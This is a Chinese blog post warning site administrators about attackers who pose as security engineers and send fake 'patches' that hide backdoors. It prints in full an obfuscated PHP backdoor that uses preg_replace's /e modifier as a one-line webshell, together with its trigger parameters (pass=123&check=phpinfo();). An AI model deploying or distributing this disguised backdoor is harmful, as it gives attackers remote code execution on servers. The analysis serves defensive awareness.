博客也很久没更新了。
0x01 钓鱼模式
0x02 神奇补丁程序 这是所谓的安全工程师发给网管的安全代码。
1000000){ die('404');}if (isset($_post[\x70\x61\x73\x73]) && isset($_post[\x63\x68\x65\x63\x6b])){ $__php_debug = array ( 'zendname' => '70,61,73,73', 'zendport' => '63,68,65,63,6b', 'zendsalt' => '202cb962ac59075b964b07152d234b70' //792e19812fafd57c7ac150af768d95ce ); $__php_replace = array ( pack('h*', join('', explode(',', $__php_debug['zendname']))), pack('h*', join('', explode(',', $__php_debug['zendport']))), $__php_debug['zendsalt'] ); $__php_request = &$_post; $__php_token = md5($__php_request[$__php_replace[0]]); if ($__php_token == $__php_replace[2]) { $__php_token = preg_replace ( chr(47).$__php_token.chr(47).chr(101), $__php_request[$__php_replace[1]], $__php_token ); unset ( $__php_debug, $__php_replace, $__php_request, $__php_token ); if(!defined('_debug_token')) exit ('get token fail!'); }}
代码我已经将792e19812fafd57c7ac150af768d95ce这个md5换成了123的md5 202cb962ac59075b964b07152d234b70
这个代码一看,如果之前没接触过类似的代码,应该会有很多人会认为:这个代码搞啥玩儿,php内核?
乍眼看,应该没什么后门
百度搜索一下792e19812fafd57c7ac150af768d95ce,看快照,可以发现
最后解密出来其实是利用preg_replace的/e来执行的一句话webshell。
利用方式:pass=123&check=phpinfo();
钓鱼的代码还有以下几种:
有的黑客将后门代码放在 扫描木马后门 的程序里。特别的猥琐
0x03 具体钓鱼 下面是一个黑客钓鱼的真实场景。先看下黑阔的背景身份。
伪装安全工程师 个人主页: http://loudong.360.cn/vul/profile/uid/2822960/
伪装成360补天的一名白帽子,并且把自己qq地址写成360公司的地址
但是黑客却以为补天的白帽子就是360的员工
不过站长也确实信了他360的身份。因为改的备注是 360安全小组
强调补丁的强大 用了补丁代码,*地址立马404。还用chattr +i 设置文件为read only
0x04 总结 安全,从我做起